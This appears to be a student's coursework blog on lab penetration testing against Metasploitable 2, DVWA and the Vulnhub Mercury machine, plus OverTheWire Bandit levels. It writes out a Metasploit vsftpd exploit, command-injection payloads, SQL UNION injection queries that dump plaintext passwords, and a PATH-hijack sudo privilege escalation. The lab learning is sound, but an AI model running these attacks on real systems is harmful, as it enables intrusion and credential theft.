Pentest week 2, Turbo Boosted

Added links to exercise sections 2021-11-09

Penetration testing week 2

This week we started learning about some tools used on the penetration testing course. Specifically nmap and metasploit. This weeks tasks contain exercises on:

Links to exercise sections

SQL recap

Exercise a

To refresh on some SQL we were tasked to do a few exercises on SQLZOO. I'll just put screen captures of the exercises here.

sql11 sql12 sql13 sql21 sql22 sql23 sql24 sql25 sql26 sql27 sql28 sql29 sql210 sql211 sql212 sql213 sql214 sql215 sql32 sql33 sql34 sql35 sql36 sql37 sql38 sql39 sql310 sql311 sql312 sql313

Installing Metasploitable 2

Exercise b

I downloaded the Metasploitable 2 machine files from sourceforge and created a new 64-bit Ubuntu virtual machine with VirtualBox. When choosing the hard disk for the machine, choose tho use an existing hard disk file and use the one that is in the downloaded machine.

Metasploitable 2 install

I then created a new VirtualBox network so that I could connect both my Kali and Metasploitable machines to it without them having access to the internet.

VirtualBox network

Network settings

Exercise c

As tasked in the course material I started logging everything with script -fa meta2 on the Kali machine before starting. The -f flag makes it so that the output from the shell is written to file after each write and the -a flag appends to the end of the file instead of overwriting the current file. Here is an example of how a script log can be combed through later for info on the session (command ran after the session).

Script grep

Exercise d

I then tested that my machines weren't visible to the internet by pinging Google's dns.

Kali ping

Meta ping

Exercise e

I started by checking with ipcalc that I would be targeting the right network and then ran a ping sweep with nmap.

Meta sweep

There are three machines up on the network:


Exercise f

All the machines responded very quickly because they are in a local network (almost under a millisecond for each). I then ran a port scan on each machine with nmap --top-ports 1000 Only one machine had any ports open of the ones checked so it is the Metasploitable 2 machine. It also has quite many ports open so it would be unlikely for any other machine to have that.

port scan

Exercise g

Then I ran a scan with banner grabbing and host discovery to get a more thorough look at the machine sudo nmap -sV

nmap version detection

The following table contains explanations of the results as I understand them.

portserviceversionnewest versionpurposeshould it be visible to internet?
21/tcpftpvsftpd licensed FTP server for UNIX systemsyes
22/tcpsshOpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)8.8secure shellyes
23/tcptelnetLinux telnetd (no version)-A server that supports interactive DARPA telnet communication protocol to serve an interactive terminalyes
25/tcpsmtpPostfix smtpd (no version)3.6.2A mail server daemonyes
53/tcpdomainISC BIND serveryes
80/tcphttpApache httpd 2.2.8 ((Ubuntu) DAV/2)2.4.51HTTP server for servinf websitesyes
111/tcprpcbind2 (RPC #100000) (no version)-A server that converts remote procedure call program numbers into universal addresses. The command rpcinfo can be used to list the services.yes
139/tcpnetbios-ssnSamba smbd 3.X - 4.X (workgroup: WORKGROUP)4.15A server daemon that provides filesharing and printing sevices to Windows clients. This port runs on NetBIOS on local networkdangerous
445/tcpnetbios-ssnSamba smbd 3.X - 4.X (workgroup: WORKGROUP)4.15A server daemon that provides filesharing and printing sevices to Windows clients. This port allows connections over the internet with TCPdangerous
512/tcpexecnetkit-rsh rexecd (no version)-A legacy remote shell tool to run commands on a remote computer through an rsh connection. Uses user/pass authentication. websiteyes/no(legacy software so nowadays no)
513/tcploginOpenBSD or Solaris rlogind (no version)OpenBSD/7.0, Solaris/11.4OpenBSD is a UNIX-like OS with a focus on security. Solaris is a UNIX-like OS by Oracle so rlogind is the daemon accepting remote loginsyes
514/tcpshellNetkit rshd (no version)-The same as rexecd, but is
1099/tcpjava-rmiGNU Classpath grmiregistry (no version)-Java Remote Method Invocation registry where objects from remote RMI servers are registered sot that RMI clients can look them up. infono (developed for intranet)
1524/tcpbindshellMetasploitable root shell (no version)-A shell bound to this port that runs commands sent to it and responds with the
2049/tcpnfs2-4 (RPC #100003) (no version)-Network file system that is indexed with rpc.-
2121/tcpftpProFTPD licensed ftp serverno, insecure
3306/tcpmysqlMySQL 5.0.51a-3ubuntu58.0.27GPLv2 licensed open source relational database management systemno, databases should ideally be used through a server application or web interface
5432/tcppostgresqlPostgreSQL DB 8.3.0 - 8.3.714.0Open source object-relational database systemno, databases should ideally be used through a server application or web interface
5900/tcpvncVNC (protocol 3.3)VNC Server/6.8.0, VNC Viewer/6.21.920Virtual Network Computing. A graphical desktop-sharing system for remote controlling a computer. wikipediayes, but not constantly
6000/tcpX11(access denied) (no version)-The X window system which provides the basic framework for a GUI based environment. Because the port is open this allows access to information about the windows on the system, screenshotting, keylogging, reverse shell, remote desktop view more infono
6667/tcpircUnrealIRCd (no version)5.2.2Open source IRC server daemonyes
8009/tcpajp13Apache Jserv (Protocol v1.3)1.3A binary protocol that can proxy inbound requests from a webserver to an application server. infono
8180/tcphttpApache Tomcat/Coyote JSP engine 1.1-Apache Tomcat provides software to run Java applets in the browser. Coyote is a connector component for Tomcat that supports HTTP 1.1 and 2 and allows the Java servlets to act as plain web servers. Metasploitable/Apache/Tomcat and Coyoteyes

Exercise h

The task is to penetrate the vsftpd-service and I decided to use msfconsole to break in as it was shown to us during lesson. I start by searching for exploits with search vsftpd and see that there is one for the same version of it that is running on the target machine. The rank being excellent the exlpoit should work without crashing and have a high chance fow success.

vsftpd exploit

The console tells that there is no payload specified and that it will default to cmd/unix/interact and that will be fine for now. I then checked the options for the exploit with show options and see that there is a required filed RHOSTS that defines the target machine and set it to the ip that I found to be Metasploitable 2. Then to use the exploit I gave the command exploit.

vsftpd exploit

The exploit is successful so I tried to upgrade the session to a meterpreter shell by setting the current sessions to background with background and upgrading with sessions -u 1. I then switch to the meterpreter session and check the user I am and some system info with getuid and sysinfo. I see that I'm root so I download the password hashes and then change root password.


I test on another terminal that I can ssh into Metasploitable with the new password and see it works. I then close msfconsole for now.

root shell

Exercise i

The next task was to check port 1524 from the machine with netcat. As I previously stated the port has an open shell that will run every command it is given and respond. To connect to it with netcat is simple with just nc 1524. It opened a connection to a root shell and allows you to quite literally do anything you want on the target machine.

Damn Vulnerable Web Application

Exercise j

The dvwa is available at Metasploitable's ip on a regular http website, so I opened it up on FireFox on my Kali machine and logged in with the default user account.


I then set the security to low on the web app as instructed on our homework.


Exercise k

I then set out to exploit the command execution vulnerability and researched the page from the given source code.

command execution

if( isset( $_POST[ 'submit' ] ) ) {
    $target = $_REQUEST[ 'ip' ];
    // Determine OS and execute the ping command.
    if (stristr(php_uname('s'), 'Windows NT')) { 
        $cmd = shell_exec( 'ping  ' . $target );
        echo '<pre>'.$cmd.'</pre>';
    } else { 
        $cmd = shell_exec( 'ping  -c 3 ' . $target );
        echo '<pre>'.$cmd.'</pre>';

From the source code for the PhP snippet I could see that the usert submitted parameter is just executed without any parsing or processing so I could just append my own code to execute after the ip. To see some info about the process executing the task I gave the following input to the form. I removed the ping response from the following snippet as it is irrelevant for now. && whoami && groups && uname -a && pwd && ls -la
## output
www-data # user
www-data # group
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
/var/www/dvwa/vulnerabilities/exec # pwd
total 20
drwxr-xr-x  4 www-data www-data 4096 May 20  2012 .
drwxr-xr-x 11 www-data www-data 4096 May 20  2012 ..
drwxr-xr-x  2 www-data www-data 4096 May 20  2012 help
-rw-r--r--  1 www-data www-data 1509 Mar 16  2010 index.php
drwxr-xr-x  2 www-data www-data 4096 May 20  2012 source

After some trying I found that I had access to everything under /var/www with the user www-data. I could for example add text to the current page with && echo hello >> index.php and read/modify the .htaccess file.


htaccess && cat /var/www/dvwa/.htaccess && sed -i 's/deny from all/#deny from all/' /var/www/dvwa/.htaccess && echo 'allow from all' >> /var/www/dvwa/.htaccess


Vulnhub: MERCURY

Exercise l

As the machine to download from Vulnhub I decided to get the machine THE PLANETS: MERCURY. I downloaded it and set it up on VirtualBox on the same host-only network as my Kali and Metasploitable 2.

I started with running the same nmap ping sweep and port scans as I did with Metasploitable 2. On the ping sweep there was 1 new machine on the network, so that is the new machine.


I see that there is an ssh open on port 22 and a wsgi server running on port 8080. I check it out on a browser.


Exercise o

I tried running gobuster to find any info on the filestructure of the webpage, but that failed to bring any useful results.


Then I decided to just try /login page on the website and got this page in response. It seems that the server is running Django in debug mode and it revealed the only valid url path on the error page.


The error page reveals the mercuryfacts/ path so I try it next. This page contains links to two pages.


The Mercury Facts link opens into a page with the url ending in /mercuryfacts/1/. I then tried to use a special character in the url which resulted in an error page telling me I have an error in my SQL syntax.


This reveals that the database is directly queried with the last portion of the url path and seemingly without any parsing so it seems vulnerable to sql injections. After some searching I find some information on how to inject SQL with unions: SQL injection UNION attacks. To find database tables you can use MySQL's INFORMATION_SCHEMA as it stores information about all other databases. Using the following query I got the table names: 1 UNION SELECT table_name FROM information_schema.tables


From there I can see that there is a table named users and then to find out the columns of the users table I used the following query: 1 UNION SELECT column_name FROM information_schema.columns WHERE table_name = 'users'. The columns in the table were: id, username and password. I then tried to select the usernames and passwords with: 1 UNION SELECT username FROM users UNION SELECT password FROM users. The response contained 4 users with their passwords in plaintext.


The user webmaster seems somewhat important so I try to use his credentials on with ssh. The credentials work and in the users HOME directory is the user flag.


From the mercury_project folder I found notes.txt which contained some base64 text after what I assume are usernames and passwords so I try decoding them.


At least the webmaster password is the same so I try logging in to the linuxmaster user with the new password.


As linuxmaster with sudo -l I can see that I have permissions to run a single command as sudo that runs tail on the syslog. After searching a bit about privilege escalation I found an article that explains about using a sudoed vi to run a root shell and a writeup on a different vulnhub machine containing an explanation on creating a symbolic link between different commands and overwriting the PATH variable to run a different command than intended in the script. So I need to create a link between tail and /bin/vi, change the PATH and run the check_syslog command.

I changed first to the users own directory with cd and then creates a soft link to vi from tail in the current directory with ln -s /bin/vi tail and exported it with export PATH=.:$PATH. This adds the current directory at the start of the path. sudo needs to be run with the --preserve-env flag so that the PATH we just set up is used.


I am now in a root shell so I check the root directory for the flag and it is there.


Over The Wire: Bandit continues

Exercise t

In this section I'm continuing where I left off last time on the Bandit wargame, level 11.

Level 11

On this level the password is in an "encrypted" file that is using rot13 to change the letters by 13 positions. I found a StackOverflow question on using rot13 in the shell and found this useful snippet: echo 'string' | tr 'A-Za-z' 'N-ZA-Mn-za-m'. It worked out right away and the level was done.


Level 12

On this level the password was in a hexdump of a file that has been compressed multiple times. To start off I copied the data.txt file into a temporary folder in /tmp and undid the hexdump with cat data.txt | xxd -r > data. Then to find out what kind of compressed file it was I used file {filename} and changed the filename so that the programs recognised the file. It was compressed maybe 8 times and it was one of the following each time:

  • gzip file
  • bzip file
  • tar file

Level 13

On this level there was no password readable for the current user and only a private ssh-key file for the next user that could read it. So I just ssh'd in with ssh -i sskkey.private bandit14@localhost and read the file for the password.

Level 14

On this level the next password could be acquired by submitting the current password to the port 30000 on localhost. As there was nc as one of the commands that could be used to solve this level I tried nc localhost 30000 and entered the password when the connection started and I got the next password.

Level 15

This level was the same as 14 except the port was 30001 and the communication had to be SSL encrypted. The suggested commands listed openssl and s_client so I started by reading the man page for openssl. There was a mention of s_client as a standard command to establish a transparent connection to a remote server using SSL/TLS so that was the right tool for the job. With man openssl s_client there was the syntax for connecting which was openssl s_client -connect {host}:{port} and with that I got the next password.

Level 16

On this level I was given just the port ranges for where the port might be where to submit the current password so I had to start by enumerating the ports with nmap -sV -p31000-32000 localhost to find out the right one. There were 4 ports open with one having SSL and no echo service. Giving it the current password returned a private RSA key that would be used to gain access to the next level. To use it I saved it in the tmp folder with echo {current pass} | openssl s_client -connect localhost:31790 -quiet > /tmp/jarco16/17key.


To get to the next level I used ssh -i /tmp/jarco16/17key bandit17@localhost but I got a warning about an unprotected private key file so I had to also change the permissions for the file with chmod go-rwx /tmp/jarco16/17key to revoke all access to other users.

Level 17

On this level there are two files with a long list of passwords in each. In the suggested commands there is the diff command which seems useful just from the name. After checking the man page I found out it compares files for differences line by line and spits out the differences. To get the next password I just had to use diff passwords.old and was given the next password.

Level 18

When trying to ssh into this level's account you are automatically logged out and cannot open a terminal session ans bandit18. The task tells that the next password is in a readme file in the home directory so it can be read by just passing a command with the ssh connection to read it. ssh bandit18@localhost "cat readme".


Reading task

Exercise z

This week as a reading task we had part of the following book: Jaswal 2020: Mastering Metasploit - 4ed. Here is a short summary of Chapter 1: Approaching a Penetration test Using Metasploit.

  • Metasploit is an open source penetration testing framework
  • Allows automating the testing of a large network
  • Makes cleaner exits from the exploited host
  • Metasploit uses databases to store results of hosts, services and vulnerabilities
  • Nmap can be run from metasploit to populate the database with info about host
  • Has built-in search function to look up vulnerabilities on specific service and host-os versions
  • After choosing an exploit (and a payload) the exploit can be run from metasploit to gain access to host
  • Lateral movement from host possible with modules and autorouting traffic through compromised host
  • Allows compromising accounts running processes on the compromise machine using a token stealing method
    • This allows further exploiting other connected machines
  • Password hashes can be dumped or clear text passwords may be possible to be dumped from memory with the use of plugins